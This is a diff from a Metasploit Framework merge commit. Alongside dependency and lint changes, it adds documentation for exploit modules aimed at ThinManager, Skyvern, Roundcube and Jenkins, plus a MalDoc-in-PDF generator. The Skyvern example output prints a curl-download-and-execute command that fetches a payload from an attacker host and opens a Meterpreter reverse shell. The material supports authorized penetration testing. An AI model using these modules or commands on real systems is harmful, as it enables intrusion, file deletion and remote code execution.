Merge pull request #20360 from adfoster-r7/add-syslog-to-gemspec

Add syslog to gemspec
2025-06-29 17:40:40 +01:00 · 2025-06-29 15:57:53 +01:00 · 2025-06-29 14:45:21 +00:00 · 2025-06-29 13:44:28 +01:00 · 2025-06-29 01:05:42 +01:00 · 2025-06-27 11:26:09 -04:00
2610 changed files with 135732 additions and 98173 deletions
@@ -23,6 +23,7 @@ require:
  - ./lib/rubocop/cop/lint/deprecated_gem_version.rb
  - ./lib/rubocop/cop/lint/module_enforce_notes.rb
  - ./lib/rubocop/cop/lint/detect_invalid_pack_directives.rb
+  - ./lib/rubocop/cop/lint/detect_metadata_trailing_leading_whitespace.rb

 Layout/SpaceBeforeBrackets:
  Enabled: true
@@ -113,6 +114,12 @@ Style/DocumentDynamicEvalDefinition:
 Style/EndlessMethod:
  Enabled: true

+Style/FormatStringToken:
+  Enabled: true
+  Exclude:
+  # We aren't ready to enable this for modules yet
+    - 'modules/**/*'
+
 Style/HashExcept:
  Enabled: true

@@ -152,6 +159,11 @@ Style/RedundantAssignment:
    and return expression
  Enabled: false

+Style/RedundantParentheses:
+  Description: >-
+    Disabled as it sometimes improves the readability of code
+  Enabled: false
+
 Style/RedundantRegexpArgument:
  Enabled: true
  Exclude:
@@ -661,3 +673,6 @@ Style/UnpackFirst:
    Disabling to make it easier to copy/paste `unpack('h*')` expressions from code
    into a debugging REPL.
  Enabled: false
+
+Lint/DetectMetadataTrailingLeadingWhitespace:
+  Enabled: true
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.4.67)
+    metasploit-framework (6.4.72)
      aarch64
      abbrev
      actionpack (~> 7.1.0)
@@ -47,7 +47,7 @@ PATH
      metasploit-model
      metasploit-payloads (= 2.0.221)
      metasploit_data_models (>= 6.0.7)
-      metasploit_payloads-mettle (= 1.0.35)
+      metasploit_payloads-mettle (= 1.0.42)
      mqtt
      msgpack (~> 1.6.0)
      mutex_m
@@ -104,6 +104,7 @@ PATH
      sqlite3 (= 1.7.3)
      sshkey
      swagger-blocks
+      syslog
      thin
      tzinfo
      tzinfo-data
@@ -339,7 +340,7 @@ GEM
      railties (~> 7.0)
      recog
      webrick
-    metasploit_payloads-mettle (1.0.35)
+    metasploit_payloads-mettle (1.0.42)
    method_source (1.1.0)
    mime-types (3.6.0)
      logger
@@ -475,7 +476,8 @@ GEM
      rex-random_identifier
      rex-text
      ruby-rc4
-    rex-random_identifier (0.1.15)
+    rex-random_identifier (0.1.16)
+      bigdecimal
      rex-text
    rex-registry (0.1.6)
    rex-rop_builder (0.1.6)
@@ -571,6 +573,8 @@ GEM
    sshkey (3.0.0)
    strptime (0.2.5)
    swagger-blocks (3.0.0)
+    syslog (0.3.0)
+      logger
    test-prof (1.4.4)
    thin (1.8.2)
      daemons (~> 1.0, >= 1.0.9)
@@ -93,11 +93,11 @@ memory_profiler, 1.1.0, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 5.0.4, "New BSD"
 metasploit-credential, 6.0.16, "New BSD"
-metasploit-framework, 6.4.67, "New BSD"
+metasploit-framework, 6.4.72, "New BSD"
 metasploit-model, 5.0.3, "New BSD"
 metasploit-payloads, 2.0.221, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 6.0.9, "New BSD"
-metasploit_payloads-mettle, 1.0.35, "3-clause (or ""modified"") BSD"
+metasploit_payloads-mettle, 1.0.42, "3-clause (or ""modified"") BSD"
 method_source, 1.1.0, MIT
 mime-types, 3.6.0, MIT
 mime-types-data, 3.2025.0304, MIT
@@ -165,7 +165,7 @@ rex-mime, 0.1.11, "New BSD"
 rex-nop, 0.1.4, "New BSD"
 rex-ole, 0.1.9, "New BSD"
 rex-powershell, 0.1.101, "New BSD"
-rex-random_identifier, 0.1.15, "New BSD"
+rex-random_identifier, 0.1.16, "New BSD"
 rex-registry, 0.1.6, "New BSD"
 rex-rop_builder, 0.1.6, "New BSD"
 rex-socket, 0.1.62, "New BSD"
@@ -67,6 +67,8 @@
 <% description = "Module may cause a noise (Examples: audio output from the speakers or hardware beeps)." %>
 <% elsif side_effect == "physical-effects" %>
 <% description = "Module may produce physical effects (Examples: the device makes movement or flashes LEDs)." %>
+<% elsif side_effect == "unknown-side-effects" %>
+<% description = "Module side effects are unknown." %>
 <% end %>

 * **<%= side_effect %>:** <%= description %>
@@ -85,6 +87,8 @@
 <% description = "The module isn't expected to get a shell reliably (such as only once)." %>
 <% elsif reliability == "event-dependent" %>
 <% description = "The module may not execute the payload until an external event occurs. For instance, a cron job, machine restart, user interaction within a GUI element, etc." %>
+<% elsif reliability == "unknown-reliability" %>
+<% description = "Module reliability is unknown." %>
 <% end %>

 * **<%= reliability %>:** <%= description %>
@@ -109,6 +113,8 @@
 <% description = "Module may cause a resource (such as a file or data in a database) to be unavailable for the service." %>
 <% elsif stability == "os-resource-loss" %>
 <% description = "Modules may cause a resource (such as a file) to be unavailable for the OS." %>
+<% elsif stability == "unknown-stability" %>
+<% description = "Module stability is unknown." %>
 <% end %>

 * **<%= stability %>:** <%= description %>
@@ -0,0 +1,35 @@
+BITS 64
+ehdr:                            ; Elf32_Ehdr
+  db    0x7F, "ELF", 2, 2, 1, 0  ;   e_ident
+  db    0, 0, 0, 0,  0, 0, 0, 0  ;
+  dw    0x0200                   ;   e_type       = ET_EXEC for an executable
+  dw    0x1500                   ;   e_machine    = PPC64
+  dd    0x01000000                        ;   e_version
+  dq    0x7810000000000000      ;   e_entry
+  dq    0x4000000000000000       ;   e_phoff
+  dq    0                        ;   e_shoff
+  dd    0                        ;   e_flags
+  dw    0x4000                   ;   e_ehsize
+  dw    0x3800                   ;   e_phentsize
+  dw    0x0100                   ;   e_phnum
+  dw    0                        ;   e_shentsize
+  dw    0                        ;   e_shnum
+  dw    0                        ;   e_shstrndx
+
+ehdrsize equ  $ - ehdr
+
+phdr:                            ; Elf32_Phdr
+
+  dd    0x01000000               ;   p_type       = pt_load
+  dd    0x07000000               ;   p_flags      = rwx
+  dq    0                        ;   p_offset
+  dq    0x0010000000000000       ;   p_vaddr
+  dq    0x0010000000000000                       ;   p_paddr
+  dq    0xefbeadde       ;   p_filesz
+  dq    0xefbeadde       ;   p_memsz
+  dq    0x0000100000000000      ;   p_align
+
+phdrsize equ  $ - phdr
+
+_start:
+dq      0x8010000000000000
@@ -23,3 +23,4 @@ W32TIME_ALT
 wkssvc
 PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
 db2remotecmd
+CxUIUSvcChannel
@@ -46,6 +46,7 @@ slideshow-gallery
 sp-client-document-manager
 subscribe-to-comments
 suretriggers
+tatsu
 ultimate-member
 user-registration
 user-registration-pro
@@ -0,0 +1,55 @@
+## Vulnerable Application
+
+This module exploits a path traversal vulnerability in ThinManager <= v13.1.0 (CVE-2023-2915) to delete an arbitrary file from the
+system.
+
+The affected service listens by default on TCP port 2031 and runs in the context of NT AUTHORITY\SYSTEM.
+
+## Testing
+
+The software can be obtained from
+[the vendor](https://thinmanager.com/downloads/).
+
+**Successfully tested on**
+
+- ThinManager v13.1.0 on Windows 22H2
+- ThinManager v13.0.1 on Windows 22H2
+- ThinManager v13.0.0 on Windows 22H2
+- ThinManager v12.1.5 on Windows 22H2
+- ThinManager v10.0.2 on Windows 22H2
+
+## Verification Steps
+
+1. Install and run the application
+2. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use auxiliary/gather/thinmanager_traversal_delete
+msf6 auxiliary(gather/thinmanager_traversal_delete) > set RHOSTS <IP>
+msf6 auxiliary(gather/thinmanager_traversal_delete) > set FILE <file to delete>
+msf6 auxiliary(gather/thinmanager_traversal_delete) > run
+```
+
+This should delete the file as specified through FILE from the remote server.
+
+## Options
+
+### FILE
+The file to delete from the remote server.
+
+## Scenarios
+
+Running the exploit against ThinManager v13.0.1 on Windows 22H2 should result in an output similar to the following:
+
+```
+msf6 auxiliary(gather/thinmanager_traversal_delete) > run
+[*] Running module against 192.168.137.229
+
+[*] 192.168.137.229:2031 - Running automatic check ("set AutoCheck false" to disable)
+[!] 192.168.137.229:2031 - The service is running, but could not be validated.
+[*] 192.168.137.229:2031 - Sending handshake...
+[*] 192.168.137.229:2031 - Received handshake response.
+[*] 192.168.137.229:2031 - Deleting /Windows/win.ini from 192.168.137.229
+[+] 192.168.137.229:2031 - Received response from target.
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,101 @@
+## Vulnerable Application
+
+The technique is called "MalDoc in PDF". This technique hides malicious Word documents in PDF files,
+which is why malicious code contained in them cannot be detected by many analysis tools.
+
+The document can be opened in both Microsoft Word and a PDF reader.
+
+However, for the macro to run, you must open this document in Microsoft Word. The attack does not bypass
+configured macro locks. The malicious macros are also not executed when the file is opened in PDF readers
+or similar software.
+
+### Introduction
+
+A malicious MHT file created can be opened in Microsoft Word even though it has magic numbers and file
+structure of PDF.
+
+If the file has configured macro, by opening it in Microsoft Word, VBS runs and performs malicious behaviors.
+
+## For Testing
+
+You create a `Single File Web Page (*.mht, *.mhtml)` file containing a VBS macro. For testing, you can use the
+following macro:
+
+```
+Sub AutoOpen()
+   MsgBox "Macro executed successfully!", vbInformation, "Information"
+End Sub
+```
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `auxiliary/fileformat/maldoc_in_pdf_polyglot`
+3. Do: `set FILENAME /tmp/macro.htm`
+4. Do: `run`
+
+## Options
+
+### FILENAME
+
+The input MHT filename with macro embedded.
+
+### INJECTED_PDF
+
+The input PDF filename to be injected. (optional)
+
+### MESSAGE_PDF
+
+The message to display in the local PDF template (if INJECTED_PDF is NOT used). Default: You must open this document in Microsoft Word
+
+## Scenarios
+
+### Create without PDF template
+
+```
+msf6 auxiliary(fileformat/maldoc_in_pdf_polyglot) > options 
+
+Module options (auxiliary/fileformat/maldoc_in_pdf_polyglot):
+
+   Name          Current Setting                                Required  Description
+   ----          ---------------                                --------  -----------
+   FILENAME      /tmp/macro.mht                                 yes       The input MHT filename with macro embedded
+   INJECTED_PDF                                                 no        The input PDF filename to be injected (optional)
+   MESSAGE_PDF   You must open this document in Microsoft Word  no        The message to display in the local PDF template (if INJECTED_PDF is NOT used)
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(fileformat/maldoc_in_pdf_polyglot) > run
+[*] PDF creation using local template
+[+] The file 'macro.doc' is stored at '/home/mekhalleh/.msf4/local/macro.doc'
+[*] Auxiliary module execution completed
+```
+
+### Create using PDF template
+
+```
+msf6 auxiliary(fileformat/maldoc_in_pdf_polyglot) > options 
+
+Module options (auxiliary/fileformat/maldoc_in_pdf_polyglot):
+
+   Name          Current Setting                                Required  Description
+   ----          ---------------                                --------  -----------
+   FILENAME      /tmp/macro.mht                                 yes       The input MHT filename with macro embedded
+   INJECTED_PDF  /tmp/injected.pdf                              no        The input PDF filename to be injected (optional)
+   MESSAGE_PDF   You must open this document in Microsoft Word  no        The message to display in the local PDF template (if INJECTED_PDF is NOT used)
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(fileformat/maldoc_in_pdf_polyglot) > run
+[*] PDF creation using 'injected.pdf' as template
+[+] The file 'macro.doc' is stored at '/home/mekhalleh/.msf4/local/macro.doc'
+[*] Auxiliary module execution completed
+```
+
+## References
+
+1. <https://blogs.jpcert.or.jp/en/2023/08/maldocinpdf.html>
+2. <https://socradar.io/maldoc-in-pdf-a-novel-method-to-distribute-malicious-macros/>
+3. <https://www.nospamproxy.de/en/maldoc-in-pdf-danger-from-word-files-hidden-in-pdfs/>
+4. <https://github.com/exa-offsec/maldoc_in_pdf_polyglot/tree/main/demo>
@@ -6,7 +6,7 @@ This module uses an anonymous-bind LDAP connection to dump data from
 the vmdir service in VMware vCenter Server version 6.7 prior to the
 6.7U3f update, only if upgraded from a previous release line, such as
 6.0 or 6.5.
-If the bind username and password are provided (BIND_DN and BIND_PW
+If the bind username and password are provided (BIND_DN and LDAPPassword
 options), these credentials will be used instead of attempting an
 anonymous bind.

@@ -36,18 +36,33 @@ If you already have the LDAP base DN, you may set it in this option.
 ### VMware vCenter Server 6.7 virtual appliance on ESXi

 ```
-msf5 > use auxiliary/gather/vmware_vcenter_vmdir_ldap
-msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > options
+msf6 auxiliary(gather/vmware_vcenter_vmdir_ldap) > show options

-   Name      Current Setting  Required  Description
-   ----      ---------------  --------  -----------
-   BASE_DN                    no        LDAP base DN if you already have it
-   DOMAIN                     no        The domain to authenticate to
-   PASSWORD                   no        The password to authenticate with
-   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
-   RPORT     636              yes       The target port
-   SSL       true             no        Enable SSL on the LDAP connection
-   USERNAME                   no        The username to authenticate with
+Module options (auxiliary/gather/vmware_vcenter_vmdir_ldap):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   BASE_DN                   no        LDAP base DN if you already have it
+   SSL      true             no        Enable SSL on the LDAP connection
+
+
+   Used when connecting via an existing SESSION:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION                   no        The session to run this module on
+
+
+   Used when making a new connection via RHOSTS:
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   LDAPDomain                     no        The domain to authenticate to
+   LDAPPassword                   no        The password to authenticate with
+   LDAPUsername                   no        The username to authenticate with
+   RHOSTS                         no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
+                                            metasploit.html
+   RPORT         636              no        The target port


 Auxiliary action:
@@ -57,6 +72,8 @@ Auxiliary action:
   Dump  Dump all LDAP data


+
+View the full module info with the info, or info -d command.
 msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > set rhosts [redacted]
 rhosts => [redacted]
 msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > run
@@ -0,0 +1,72 @@
+# Jenkins Enumeration Auxiliary Module
+
+## Vulnerable Application
+This module performs unauthenticated enumeration on Jenkins servers. It attempts to discover the Jenkins version, identify unauthenticated accessible endpoints, and gather useful system information when possible.
+
+Jenkins servers that do not enforce strict authentication on certain URLs (such as `/script`) are susceptible to this enumeration. This module helps penetration testers quickly identify such information leakage.
+Jenkins instances may expose sensitive information through misconfigured endpoints. Many companies unintentionally leave URLs like /script and /manage open without authentication, allowing attackers to retrieve system details. If these endpoints return data, it’s a sign that authentication settings might need to be tightened.
+
+
+## Verification Steps
+1. Start `msfconsole`
+2. Use the module: `use auxiliary/scanner/http/jenkins_enum`
+3. Set the target(s) and other options: `set RHOSTS <target IP or CIDR>`, `set RPORT 8080`, `set TARGETURI /jenkins/`, etc
+4. Run the module: `run`
+5. You might see output similar to:
+
+``` 
+[+] 192.168.1.100:8080 - Jenkins Version: 2.319.1
+[+] 192.168.1.100:8080 - /script is accessible without authentication (HTTP 200)
+[+] 192.168.1.100:8080 - Enumerating plugins...
+[+] 192.168.1.100:8080 - Plugin detected: Git Plugin 4.11.3
+[+] 192.168.1.100:8080 - System Information:
+    OS: Linux
+    OS Version: 5.4.0-77-generic
+    Architecture: amd64
+    Jenkins Home: /var/lib/jenkins
+[*] 192.168.1.100:8080 - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+## Options
+
+### RHOSTS
+Specifies the target host(s) or IP range to scan. You can input a single IP address, a range, or a CIDR subnet.
+Default: None (required)
+
+### RPORT
+Defines the target port for HTTP connections. Jenkins often runs on port 8080, but the default for this module is 80. Adjust accordingly.
+Default: 80
+
+### TARGETURI
+The base path of the Jenkins application on the target server. Usually /jenkins/ but can differ based on installation or proxy setup.
+Default: /jenkins/
+
+### THREADS
+The number of concurrent threads to use for faster scanning. Increasing this number can speed up scans but may generate more network traffic or load on the target.
+Default: 1
+
+### VHOST
+Specify a virtual host name for the HTTP Host header if Jenkins is running behind a virtual host or reverse proxy.
+Default: None
+
+## Scenarios
+This example demonstrates how to use the jenkins_enum module to enumerate information from a Jenkins server running on the local network at IP 192.168.1.100 on port 8080, where Jenkins is installed at the default /jenkins/ path.
+
+```
+msf6 > use auxiliary/scanner/http/jenkins_enum
+msf6 auxiliary(scanner/http/jenkins_enum) > set RHOSTS 192.168.1.100
+msf6 auxiliary(scanner/http/jenkins_enum) > set RPORT 8080
+msf6 auxiliary(scanner/http/jenkins_enum) > set TARGETURI /jenkins/
+msf6 auxiliary(scanner/http/jenkins_enum) > run
+
+[*] 192.168.1.100:8080 - Jenkins Version: 2.319.1
+[+] 192.168.1.100:8080 - /script is accessible without authentication (HTTP 200)
+[*] 192.168.1.100:8080 - Enumerating plugins...
+[+] 192.168.1.100:8080 - Plugin detected: Git Plugin 4.11.3
+[+] 192.168.1.100:8080 - Plugin detected: Matrix Authorization Strategy 2.6.7
+[+] 192.168.1.100:8080 - Plugin detected: Workflow CPS 2.92
+[*] 192.168.1.100:8080 - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+The module retrieves the Jenkins version and installed plugins without requiring credentials, which can help identify vulnerable plugin versions or configuration weaknesses.
@@ -0,0 +1,221 @@
+## Vulnerable Application
+
+Skyvern is browser-based automation tool integrated with AI and LLMs.
+It allows to create workflows, which can perform automation tasks based on LLMs.
+Version up to 0.1.84 is vulnerable to SSTI, which can lead to remote code execution.
+The application is available [here](https://github.com/Skyvern-AI/skyvern.git).
+
+### Installation
+
+1. `git clone https://github.com/Skyvern-AI/skyvern.git`
+2. `cd skyvern`
+3. `mv .env.example .env`
+4. `mv skyvern-frontend/.env.example skyvern-frontend/.env`
+5. Override the content of `docker-compose.yml` with the following configuration:
+```yaml
+services:
+  postgres:
+    image: postgres:14-alpine
+    restart: always
+    # comment out if you want to externally connect DB
+    ports:
+      - 5432:5432
+    volumes:
+      - ./postgres-data:/var/lib/postgresql/data
+    environment:
+      - PGDATA=/var/lib/postgresql/data/pgdata
+      - POSTGRES_USER=skyvern
+      - POSTGRES_PASSWORD=skyvern
+      - POSTGRES_DB=skyvern
+    healthcheck:
+      test: ["CMD-SHELL", "pg_isready -U skyvern"]
+      interval: 5s
+      timeout: 5s
+      retries: 5
+  skyvern:
+    image: public.ecr.aws/skyvern/skyvern:v0.1.84
+    restart: on-failure
+    env_file:
+      - .env
+    # comment out if you want to externally call skyvern API
+    ports:
+      - 8000:8000
+      - 9222:9222 # for cdp browser forwarding
+    volumes:
+      - ./artifacts:/data/artifacts
+      - ./videos:/data/videos
+      - ./har:/data/har
+      - ./log:/data/log
+      - ./.streamlit:/app/.streamlit
+      # Uncomment the following two lines if you want to connect to any local changes
+      # - ./skyvern:/app/skyvern
+      # - ./alembic:/app/alembic
+    environment:
+      - DATABASE_STRING=postgresql+psycopg://skyvern:skyvern@postgres:5432/skyvern
+      - BROWSER_TYPE=chromium-headful
+      - ENABLE_CODE_BLOCK=true
+      # - BROWSER_TYPE=cdp-connect
+      # Use this command to start Chrome with remote debugging:
+      # "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --user-data-dir="C:\chrome-cdp-profile" --no-first-run --no-default-browser-check
+      # /Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222 --user-data-dir="/Users/yourusername/chrome-cdp-profile" --no-first-run --no-default-browser-check
+      # - BROWSER_REMOTE_DEBUGGING_URL=http://host.docker.internal:9222/
+    # =========================
+    #       LLM Settings - Recommended to use skyvern CLI, `skyvern init llm` to setup your LLM's
+    # =========================
+    # OpenAI Support:
+    # If you want to use OpenAI as your LLM provider, uncomment the following lines and fill in your OpenAI API key.
+    # - ENABLE_OPENAI=true
+    # - LLM_KEY=OPENAI_GPT4O
+    # - OPENAI_API_KEY=<your_openai_key>
+    #  Gemini Support:
+    # Gemini is a new LLM provider that is currently in beta. You can use it by uncommenting the following lines and filling in your Gemini API key.
+    # - LLM_KEY=GEMINI
+    # - ENABLE_GEMINI=true
+    # - GEMINI_API_KEY=YOUR_GEMINI_KEY
+    # - LLM_KEY=GEMINI_2.5_PRO_PREVIEW_03_25
+    # If you want to use other LLM provider, like azure and anthropic:
+    # - ENABLE_ANTHROPIC=true
+    # - LLM_KEY=ANTHROPIC_CLAUDE3.5_SONNET
+    # - ANTHROPIC_API_KEY=<your_anthropic_key>
+    # Microsoft Azure OpenAI support:
+    # If you'd like to use Microsoft Azure OpenAI as your managed LLM service integration with Skyvern, use the environment variables below.
+    # In your Microsoft Azure subscription, you will need to provision the OpenAI service and deploy a model, in order to utilize it.
+    # 1. Login to the Azure Portal
+    # 2. Create an Azure Resource Group
+    # 3. Create an OpenAI resource in the Resource Group (choose a region and pricing tier)
+    # 4. From the OpenAI resource's Overview page, open the "Azure AI Foundry" portal (click the "Explore Azure AI Foundry Portal" button)
+    # 5. In Azure AI Foundry, click "Shared Resources" --> "Deployments"
+    # 6. Click "Deploy Model" --> "Deploy Base Model" --> select a model (specify this model "Deployment Name" value for the AZURE_DEPLOYMENT variable below)
+    # - ENABLE_AZURE=true
+    # - LLM_KEY=AZURE_OPENAI                          # Leave this value static, don't change it
+    # - AZURE_DEPLOYMENT=<your_azure_deployment>      # Use the OpenAI model "Deployment Name" that you deployed, using the steps above
+    # - AZURE_API_KEY=<your_azure_api_key>            # Copy and paste Key1 or Key2 from the OpenAI resource in Azure Portal
+    # - AZURE_API_BASE=<your_azure_api_base>          # Copy and paste the "Endpoint" from the OpenAI resource in Azure Portal (eg. https://xyzxyzxyz.openai.azure.com/)
+    # - AZURE_API_VERSION=<your_azure_api_version>    # Specify a valid Azure OpenAI data-plane API version (eg. 2024-08-01-preview) Docs: https://learn.microsoft.com/en-us/azure/ai-services/openai/reference
+    # Amazon Bedrock Support:
+    # Amazon Bedrock is a managed service that enables you to invoke LLMs and bill them through your AWS account.
+    # To use Amazon Bedrock as the LLM provider for Skyvern, specify the following environment variables.
+    # 1. In the AWS IAM console, create a new AWS IAM User (name it whatever you want)
+    # 2. Assign the "AmazonBedrockFullAccess" policy to the user
+    # 3. Generate an IAM Access Key under the IAM User's Security Credentials tab
+    # 4. In the Amazon Bedrock console, go to "Model Access"
+    # 5. Click Modify Model Access button
+    # 6. Enable "Claude 3.5 Sonnet v2" and save changes
+    # - ENABLE_BEDROCK=true
+    # - LLM_KEY=BEDROCK_ANTHROPIC_CLAUDE3.5_SONNET   # This is the Claude 3.5 Sonnet "V2" model. Change to BEDROCK_ANTHROPIC_CLAUDE3.5_SONNET_V1 for the non-v2 version.
+    # - AWS_REGION=us-west-2                         # Replace this with a different AWS region, if you desire
+    # - AWS_ACCESS_KEY_ID=FILL_ME_IN_PLEASE
+    # - AWS_SECRET_ACCESS_KEY=FILL_ME_IN_PLEASE
+    # Ollama Support:
+    # Ollama is a local LLM provider that can be used to run models locally on your machine.
+    # - LLM_KEY=OLLAMA
+    # - ENABLE_OLLAMA=true
+    # - OLLAMA_MODEL=qwen2.5:7b-instruct
+    # - OLLAMA_SERVER_URL=http://host.docker.internal:11434
+    # Open Router Support:
+    # - ENABLE_OPENROUTER=true
+    # - LLM_KEY=OPENROUTER
+    # - OPENROUTER_API_KEY=<your_openrouter_api_key>
+    # - OPENROUTER_MODEL=mistralai/mistral-small-3.1-24b-instruct
+    # Groq Support:
+    # - ENABLE_GROQ=true
+    # - LLM_KEY=GROQ
+    # - GROQ_API_KEY=<your_groq_api_key>
+    # - GROQ_MODEL=llama-3.1-8b-instant
+
+    # Maximum tokens to use: (only set for OpenRouter aand Ollama)
+    # - LLM_CONFIG_MAX_TOKENS=128000
+
+    # Bitwarden Settings
+    # If you are looking to integrate Skyvern with a password manager (eg Bitwarden), you can use the following environment variables.
+    # - BITWARDEN_SERVER=http://localhost  # OPTIONAL IF YOU ARE SELF HOSTING BITWARDEN
+    # - BITWARDEN_SERVER_PORT=8002 # OPTIONAL IF YOU ARE SELF HOSTING BITWARDEN
+    # - BITWARDEN_CLIENT_ID=FILL_ME_IN_PLEASE
+    # - BITWARDEN_CLIENT_SECRET=FILL_ME_IN_PLEASE
+    # - BITWARDEN_MASTER_PASSWORD=FILL_ME_IN_PLEASE
+
+    # 1Password Integration
+    # If you are looking to integrate Skyvern with 1Password, you can use the following environment variables.
+    # OP_SERVICE_ACCOUNT_TOKEN=""
+    depends_on:
+      postgres:
+        condition: service_healthy
+    healthcheck:
+      test: ["CMD", "test", "-f", "/app/.streamlit/secrets.toml"]
+      interval: 5s
+      timeout: 5s
+      retries: 5
+  skyvern-ui:
+    image: public.ecr.aws/skyvern/skyvern-ui:latest
+    restart: on-failure
+    ports:
+      - 8080:8080
+      - 9090:9090
+    volumes:
+      - ./artifacts:/data/artifacts
+      - ./videos:/data/videos
+      - ./har:/data/har
+      - ./.streamlit:/app/.streamlit
+    env_file:
+      - skyvern-frontend/.env
+    environment: {}
+    #  - VITE_ENABLE_CODE_BLOCK=true
+    # if you want to run skyvern on a remote server,
+    # you need to change the host in VITE_WSS_BASE_URL and VITE_API_BASE_URL to match your server ip
+    # If you're self-hosting this behind a dns, you'll want to set:
+    #   A route for the API: api.yourdomain.com -> localhost:8000
+    #   A route for the UI: yourdomain.com -> localhost:8080
+    #   A route for the artifact API: artifact.yourdomain.com -> localhost:9090 (maybe not needed)
+    # - VITE_WSS_BASE_URL=ws://localhost:8000/api/v1
+    #   - VITE_ARTIFACT_API_BASE_URL=http://localhost:9090
+    #   - VITE_API_BASE_URL=http://localhost:8000/api/v1
+    #   - VITE_SKYVERN_API_KEY=<get this from "settings" in the Skyvern UI>
+    depends_on:
+      skyvern:
+        condition: service_healthy
+```
+6. `docker-compose up`
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use linux/http/skyvern_ssti_cve_2025_49619`
+4. Set `rhost`,`rport`, `lhost`, `lport`
+5. Do: `set API_KEY [skyvern API key]`
+6. Do: `run`
+7. You should get a shell.
+
+## Options
+
+### API_KEY
+
+The Skyvern uses API key to access API and manage the application.
+It is necessary to view, create and modify workflows. It can be acquired from UI interface.
+
+## Scenarios
+
+Vulnerable version is <=0.1.84.
+
+```
+msf6 exploit(linux/http/skyvern_ssti_cve_2025_49619) > run verbose=true
+[*] Command to run on remote host: curl -so ./SFDHeJURLqF http://192.168.168.183:8080/YtbemzlkZg8l1wkKWmIdEg;chmod +x ./SFDHeJURLqF;./SFDHeJURLqF&
+[*] Fetch handler listening on 192.168.168.183:8080
+[*] HTTP server started
+[*] Adding resource /YtbemzlkZg8l1wkKWmIdEg
+[*] Started reverse TCP handler on 192.168.168.183:4444
+[*] Client 192.168.168.146 requested /YtbemzlkZg8l1wkKWmIdEg
+[*] Sending payload to 192.168.168.146 (curl/7.88.1)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 192.168.168.146
+[*] Meterpreter session 1 opened (192.168.168.183:4444 -> 192.168.168.146:48480) at 2025-06-23 10:04:13 +0200
+
+meterpreter > sysinfo
+Computer     : 172.18.0.3
+OS           : Debian 12.10 (Linux 6.8.0-52-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+
+```
@@ -0,0 +1,147 @@
+## Vulnerable Application
+  This module exploits an authenticated remote code execution vulnerability via a file upload
+  endpoint. The vulnerability stems from improper validation of the uploaded filename, which is
+  deserialized on the server side without sufficient sanitization. By embedding a PHP serialization
+  gadget chain in the filename, an attacker can achieve remote code execution.
+
+  This issue is tracked as CVE-2025-49113. Exploitation results in code execution as the web server
+  user.
+
+## Testing
+To set up a test environment:
+1. Set up an Roundcube.
+
+Create File
+`docker-compose.xml`
+```
+version: '3'
+
+services:
+  db:
+    image: mariadb:10.5
+    restart: always
+    environment:
+      MYSQL_ROOT_PASSWORD: example_root_pass
+      MYSQL_DATABASE: roundcube
+      MYSQL_USER: roundcube_user
+      MYSQL_PASSWORD: roundcube_pass
+    volumes:
+      - db_data:/var/lib/mysql
+
+  roundcube:
+    image: roundcube/roundcubemail:1.5.9-apache
+    depends_on:
+      - db
+    ports:
+      - "8080:80"
+    environment:
+      ROUNDCUBEMAIL_DEFAULT_HOST: <ROUNDCUBEMAIL_DEFAULT_HOST>
+      ROUNDCUBEMAIL_SMTP_SERVER: <ROUNDCUBEMAIL_SMTP_SERVER>
+      ROUNDCUBEMAIL_SMTP_PORT: 587
+      ROUNDCUBEMAIL_SMTP_USER: <ROUNDCUBEMAIL_SMTP_USER>
+      ROUNDCUBEMAIL_SMTP_PASS: <ROUNDCUBEMAIL_SMTP_PASS>
+      ROUNDCUBEMAIL_DES_KEY: randomstring
+      ROUNDCUBEMAIL_DB_TYPE: mysql
+      ROUNDCUBEMAIL_DB_HOST: db
+      ROUNDCUBEMAIL_DB_USER: roundcube_user
+      ROUNDCUBEMAIL_DB_PASSWORD: roundcube_pass
+      ROUNDCUBEMAIL_DB_NAME: roundcube
+
+volumes:
+  db_data:
+```
+
+Execute
+
+`docker compose up`
+
+2. Configure basic networking and confirm that the web service on port 8080 is reachable.
+3. Follow the verification steps below.
+
+## Options
+No custom options exist for this module.
+
+## Verification Steps
+1. Start msfconsole
+2. `use exploit/multi/http/roundcube_unauth_rce_cve_2025_49113`
+3. `set RHOSTS <TARGET_IP_ADDRESS>`
+4. `set RPORT <TARGET_PORT>`
+5. `set LHOST <LOCAL_IP>`
+6. `set LPORT <LOCAL_PORT>`
+7. `set USERNAME <USERNAME_TO_LOGIN_WITH>`
+8. `set PASSWORD <PASSWORD_TO_LOGIN_WITH>`
+9. `run`
+
+## Scenarios
+### Roundcube Linux Target
+```
+msf6 exploit(multi/http/roundcube_unauth_rce_cve_2025_49113) > show options
+
+Module options (exploit/multi/http/roundcube_unauth_rce_cve_2025_49113):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   HOST                        no        The hostname of Roundcube server
+   PASSWORD                    yes       Password to login with
